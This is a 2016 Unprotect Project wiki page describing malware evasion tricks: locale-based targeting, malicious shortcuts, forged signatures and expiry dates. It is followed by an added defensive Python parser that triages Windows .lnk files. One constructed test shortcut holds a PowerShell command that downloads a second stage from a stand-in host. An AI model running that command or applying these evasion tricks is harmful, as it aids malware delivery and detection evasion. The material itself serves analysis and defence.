Exotic Tricks

From Unprotect Project
Revision as of 15:24, 30 December 2016 by Admin (talk | contribs) (References)


Technique Description

Techniques

Below is a list of all the exotic tricks in Unprotect Project:

Exotic Tricks

Technique | Description
Infect by localisation | Some malware infects a machine based on its localisation (locale or country). Some governments shelter malicious activity as long as the targets are not inside their own country.
Malicious Shortcut | A Windows shortcut (.lnk) can store code that downloads an additional file, or can embed the malicious file directly inside the shortcut. This makes the malicious application fully undetectable by any antivirus.
Fake signature | Every executable file contains metadata that lets users trust the third party distributing the program. Malware can usurp this metadata to fool not only the user but also security tools.
Deadline infection | Attacks can be performed during a limited time window. To avoid detection, some malware contains a deadline date: once that date is reached, the malware no longer runs. Malware analysts have to change the machine's time to run the file. This technique can also defeat a sandbox if the date has already passed.
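The Malicious Shortcut row above describes a shortcut that carries a command line to fetch or run a payload; the defender's counterpart is to read what a .lnk actually launches instead of trusting its icon and name. The following Python script is an added example, not code from the Unprotect Project or the referenced Phrozen articles. It parses the ShellLinkHeader and StringData sections of a shortcut as laid out in the MS-SHLLINK specification, skips the LinkTargetIDList and LinkInfo structures rather than decoding them, ignores ExtraData, and applies a small triage heuristic (the SCRIPT_HOSTS watch list and the thresholds are the example's own assumptions). The two shortcut samples are constructed inline with the build_lnk helper so the script runs offline.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HEADER_SIZE = 0x4C  # ShellLinkHeader is always 76 bytes

# LinkFlags bits (MS-SHLLINK 2.1.1); only the ones this parser needs
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData blocks follow in this fixed order, each present only when its
# flag is set; each is a 2-byte character count followed by the text.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumption: a reviewer's watch list of hosts a document-style shortcut
# would not normally launch; not an exhaustive or authoritative set.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a shortcut into a dict."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shortcut")
    (header_size,) = struct.unpack_from("<I", data, 0)
    if header_size != HEADER_SIZE or uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a Shell Link header")
    (flags,) = struct.unpack_from("<I", data, 20)
    offset = HEADER_SIZE

    # LinkTargetIDList: 2-byte IDListSize, then that many bytes (skipped).
    if flags & HAS_LINK_TARGET_ID_LIST:
        (size,) = struct.unpack_from("<H", data, offset)
        offset += 2 + size
    # LinkInfo: its first DWORD is the total structure size (skipped).
    if flags & HAS_LINK_INFO:
        (size,) = struct.unpack_from("<I", data, offset)
        offset += size

    is_unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, offset)
        offset += 2
        width = 2 if is_unicode else 1
        raw = data[offset:offset + count * width]
        offset += count * width
        info[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
    return info


def triage(info: dict) -> list:
    """Return reasons a parsed shortcut deserves an analyst's attention."""
    reasons = []
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a command/script host: {target}")
    if "http://" in args.lower() or "https://" in args.lower():
        reasons.append("arguments contain a URL")
    if len(args) > 200:  # assumed threshold; real document shortcuts have no arguments
        reasons.append(f"unusually long argument string ({len(args)} chars)")
    return reasons


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Construct a minimal Unicode shortcut for testing (sample data only)."""
    flags = IS_UNICODE | HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH
    if arguments:
        flags |= HAS_ARGUMENTS
    header = (
        struct.pack("<I", HEADER_SIZE)
        + LNK_CLSID.bytes_le
        + struct.pack("<II", flags, 0)       # LinkFlags, FileAttributes
        + b"\x00" * 24                       # Creation/Access/Write times
        + struct.pack("<IIIH", 0, 0, 1, 0)   # FileSize, IconIndex, ShowCommand, HotKey
        + b"\x00" * 10                       # Reserved1, Reserved2, Reserved3
    )
    body = struct.pack("<H", 2) + b"\x00\x00"  # IDList holding only the TerminalID
    for text in (relative_path, arguments):
        if text:
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: a plain document shortcut and one that launches a script host
BENIGN_LNK = build_lnk(".\\Quarterly report.pdf")
SUSPICIOUS_LNK = build_lnk(
    "..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    '-NoProfile -Command "Invoke-WebRequest http://example.invalid/stage2"',
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspicious", SUSPICIOUS_LNK)):
        info = parse_lnk(blob)
        print(label, info.get("relative_path"), info.get("arguments", ""))
        for reason in triage(info):
            print("  !", reason)
```

The point of the parser is that the relative path and argument string are stored as plain length-prefixed text after the header, so a triage script can surface them without launching anything; in a real pipeline the same two fields are what a mail or endpoint filter would log for every shortcut that arrives from outside.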

References

https://www.phrozensoft.com/2016/12/shortcuts-as-entry-points-for-malware-poc-part-2-19
https://www.phrozensoft.com/2016/12/shortcuts-as-entry-points-for-malware-18
https://nakedsecurity.sophos.com/2016/12/13/nymaim-using-mac-addresses-to-uncover-virtual-environments-and-bypass-antivirus/